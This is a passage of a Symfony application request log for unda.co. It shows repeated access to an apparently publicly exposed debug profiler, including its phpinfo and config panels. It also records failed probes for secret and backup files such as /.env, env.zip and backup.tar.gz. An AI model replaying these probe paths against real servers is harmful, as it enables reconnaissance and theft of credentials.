  1539. [2025-12-17 00:04:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1540. [2025-12-17 00:06:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"07a9c5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/07a9c5?panel=validator","method":"GET"} []
  1541. [2025-12-17 00:06:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  1542. [2025-12-17 00:11:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f?panel=cache","method":"GET"} []
  1543. [2025-12-17 00:11:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1544. [2025-12-17 00:12:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1545. [2025-12-17 00:17:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f","method":"GET"} []
  1546. [2025-12-17 00:17:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1547. [2025-12-17 00:19:36] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  1548. [2025-12-17 00:24:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71?panel=cache","method":"GET"} []
  1549. [2025-12-17 00:24:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1550. [2025-12-17 00:28:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"499f40","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/499f40?panel=swiftmailer","method":"GET"} []
  1551. [2025-12-17 00:28:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  1552. [2025-12-17 00:30:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e?panel=twig","method":"GET"} []
  1553. [2025-12-17 00:30:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1554. [2025-12-17 00:37:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e?panel=time","method":"GET"} []
  1555. [2025-12-17 00:37:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1556. [2025-12-17 00:40:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/health"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/health\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1557. [2025-12-17 00:40:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1558. [2025-12-17 00:40:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  1559. [2025-12-17 00:44:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e?panel=security","method":"GET"} []
  1560. [2025-12-17 00:44:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  1561. [2025-12-17 00:45:58] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  1562. [2025-12-17 00:46:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1563. [2025-12-17 00:51:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e?panel=request","method":"GET"} []
  1564. [2025-12-17 00:51:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  1565. [2025-12-17 00:57:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e?panel=config","method":"GET"} []
  1566. [2025-12-17 00:57:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1567. [2025-12-17 00:59:52] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  1568. [2025-12-17 00:59:52] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  1569. [2025-12-17 01:04:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e?panel=cache","method":"GET"} []
  1570. [2025-12-17 01:04:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1571. [2025-12-17 01:07:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2d9351","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2d9351?panel=twig","method":"GET"} []
  1572. [2025-12-17 01:07:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1573. [2025-12-17 01:10:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c18058","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c18058","method":"GET"} []
  1574. [2025-12-17 01:10:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  1575. [2025-12-17 01:10:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37557e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37557e","method":"GET"} []
  1576. [2025-12-17 01:10:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1577. [2025-12-17 01:16:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=195.26.248.160&limit=10&method=POST","method":"GET"} []
  1578. [2025-12-17 01:16:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=195.26.248.160&limit=10&method=POST","method":"GET"} []
  1579. [2025-12-17 01:18:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f?panel=twig","method":"GET"} []
  1580. [2025-12-17 01:18:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1581. [2025-12-17 01:23:08] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b025a3","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/b025a3/search/results?limit=10&method=GET","method":"GET"} []
  1582. [2025-12-17 01:23:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  1583. [2025-12-17 01:25:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f?panel=time","method":"GET"} []
  1584. [2025-12-17 01:25:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1585. [2025-12-17 01:32:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f?panel=security","method":"GET"} []
  1586. [2025-12-17 01:32:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  1587. [2025-12-17 01:39:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f?panel=request","method":"GET"} []
  1588. [2025-12-17 01:39:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  1589. [2025-12-17 01:39:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d06d99","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d06d99?panel=form","method":"GET"} []
  1590. [2025-12-17 01:39:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  1591. [2025-12-17 01:45:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9?panel=twig","method":"GET"} []
  1592. [2025-12-17 01:45:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1593. [2025-12-17 01:51:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9?panel=time","method":"GET"} []
  1594. [2025-12-17 01:51:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1595. [2025-12-17 01:58:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9?panel=security","method":"GET"} []
  1596. [2025-12-17 01:58:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  1597. [2025-12-17 02:04:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9?panel=request","method":"GET"} []
  1598. [2025-12-17 02:04:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  1599. [2025-12-17 02:11:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9?panel=config","method":"GET"} []
  1600. [2025-12-17 02:11:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1601. [2025-12-17 02:12:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1602. [2025-12-17 02:12:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1603. [2025-12-17 02:14:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1db3bc","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/1db3bc?panel=dump","method":"GET"} []
  1604. [2025-12-17 02:14:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  1605. [2025-12-17 02:17:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9?panel=cache","method":"GET"} []
  1606. [2025-12-17 02:17:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1607. [2025-12-17 02:23:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9","method":"GET"} []
  1608. [2025-12-17 02:23:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1609. [2025-12-17 02:25:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1610. [2025-12-17 02:28:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=52.167.144.161&limit=10","method":"GET"} []
  1611. [2025-12-17 02:28:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=52.167.144.161&limit=10","method":"GET"} []
  1612. [2025-12-17 02:29:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab?panel=time","method":"GET"} []
  1613. [2025-12-17 02:29:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1614. [2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1615. [2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1616. [2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1617. [2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1618. [2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1619. [2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1620. [2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1621. [2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1622. [2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1623. [2025-12-17 02:36:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45?panel=cache","method":"GET"} []
  1624. [2025-12-17 02:36:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1625. [2025-12-17 02:42:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45","method":"GET"} []
  1626. [2025-12-17 02:42:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1627. [2025-12-17 02:48:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45?panel=config","method":"GET"} []
  1628. [2025-12-17 02:48:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1629. [2025-12-17 02:53:13] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
